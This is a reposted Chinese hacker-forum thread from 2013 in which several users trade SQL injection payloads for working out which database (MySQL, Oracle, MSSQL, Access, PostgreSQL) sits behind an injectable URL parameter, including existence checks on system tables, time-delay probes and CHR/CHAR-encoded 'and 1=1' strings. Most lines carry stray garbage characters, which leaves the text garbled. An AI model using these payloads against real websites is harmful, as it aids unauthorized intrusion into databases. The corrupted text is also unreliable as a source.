一个注射点如何最快速确认是什么类型数据库( A# m" P! \% p$ Z! c
xsser (十根阳具有长短!!) | 2013-02-05 12:36
, Q0 A3 n# w# m/ ?3 w+ Z假设这么一个注射点:' J( N/ r& ?/ G# r* j3 Y8 T1 F! G
show.html?id=2" N3 D$ P. [% r1 ^, ]5 x. p1 j
mysql:id=2 and version()>0
+ W. k. A# p" j2 f2 _5 Y1 Doracle:id=2 and '1'||'1'='11
% b; {( \8 z, [% H其他的欢迎补充0 J" i/ f2 T4 k3 W) U
1#) @1 ?3 @. T5 }: Q) C; R D
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
$ y( z% X0 n, o" I) Q* F8 iAccess:: H+ L+ S) A( K
aNd aSc(cHr(97))=97
7 a, d. n7 X2 C, I) v) m; ?& n& zand exists(select id from MSysAccessObjects)
. R& t& D% \+ E P$ C" B% `3 pSQL Server:
! z" `5 p4 D2 Q C: C3 f2 y2 Mand exists(select id from sysobjects)6 g# }& Q4 I. s0 x& X
and length(user)>0
2 x% E; s! n, Q( l, C2 N3 CMySQL:( ~; `8 Z/ o- B# B
and length(user())>0" g- s; z! U' k" i; {2 R6 i
2#
( b) h" Q" y& mxsser (十根阳具有长短!!) | 2013-02-05 12:486 H9 ]5 ?0 C/ W
@upload 如果这些都不是呢…
2 @3 m. H% Y- h; ?% E3#
3 {9 L7 r( p! {0 q& p( A- Z$ W1 Zupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03# u+ B" U4 u4 q( d7 z, Y
@xsser 不快速的,延时注入
% K8 ?0 \2 E5 K, r% s不知道这样写对不对4 v3 n m* M5 R# ?. e/ |& o) N/ e1 s
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
# x7 b( g; O* Q5 smysql:id=2 and select benchmark(1e8,current_date());
; ^: q3 R* [" e$ k% m4#4 {* [* f, N: D9 `; X# H# T- w+ D
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:106 B# [" l* o& U. w: n! D
最快的貌似是看报错信息. a7 _6 J5 S! b8 d! {! v5 K
oracle error5 \& |$ z6 p/ `" M0 d8 c; B
mssql error Y- k: b/ _* \: f: A
mysql error* k- p4 u u1 N+ i
5#
* R6 T, ]% h5 p( @! `2 h* S# ZNimda (你们都是坏银~) | 2013-02-05 13:144 s$ ?% U3 ^& w/ [
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
+ G4 P1 w& g6 A9 L6#
* b- }- W. v! Z1 i) N& rupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
* i$ O, Q, U1 L+ ^" z, o“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符: M1 }; L* P" V0 i
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
2 {: T# b. t% k- u- A“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
2 X0 Z0 h. j. W9 _7#3 l7 K/ N6 j$ Y
_Evil (HackEnd) | 2013-02-05 13:33; p; Y5 @7 Y% r2 N) X% G
PostgreSQL% r- u/ ]6 W4 l# D( N/ Z4 F% h4 F; v! X
8#
; v* Z; @8 ^. r: Z8 O$ U6 oupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:427 S5 M0 a6 h* q" X( r/ ^' \# y x
切换编码 and 1=1
" _/ h- W/ J+ A! zoracle:
' s4 y. P7 U$ {; nCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)/ ]8 J# L8 j; d3 x. N
mssql:
# j! L( h' M, U9 c( [CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)9 N, d ~& I2 @: g1 ]% ~
mysql:$ s. j' ^# ^' |& I! N+ W5 P% b( j; v
CHAR(97, 110, 100, 32, 49, 61, 49)- Z# F& j4 s+ }( ~% S
9#2 O1 D& A7 p+ s8 P( G! d
xsser (十根阳具有长短!!) | 2013-02-05 14:31
. H. }6 ]: A8 |& X) q# q@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?" F0 r( l2 o6 B2 ~9 x6 x
10#
: C1 x: B9 J5 n1 W& Uupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
+ _8 ?, }7 `+ d( W! W@xsser 是奇葩数据库类型的么?; o3 {7 {' M# |1 |) R& u/ W3 ^
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
& r. F6 |. H$ {5 P* O9 e& q/ k. i- x1.是否可以使用特定的函数来判断,该数据库特有的& v2 Y% I( `4 |0 V
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
( V- A/ N! V- I3.是否可以编码查询
' o' {4 N( H* b% `4.是否显可以利用错信息2 D/ G) m9 B& s; {/ k1 V* @. E7 w
5.是否存在数据库某些特性辅助判断1 [6 ]4 `9 ?& _5 ^3 ^2 I3 m
个人见解
# [9 f7 p6 z. k/ [& }8 B7 |11#
1 z0 r5 Q9 H. N& Q* O3 Y小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
/ C( J5 X2 O* _ n已收藏,mssql可以直接看到错误提示的吧~
6 o& ]# l' m4 A4 \4 B8 r7 m/ x12#1 G3 b- q: W! b6 b) X1 L& t
Passer_by | 2013-02-05 15:09
0 H3 }' g' O9 f7 D3 T1 q* _曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
" f( A* W0 y. \, z9 ?from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对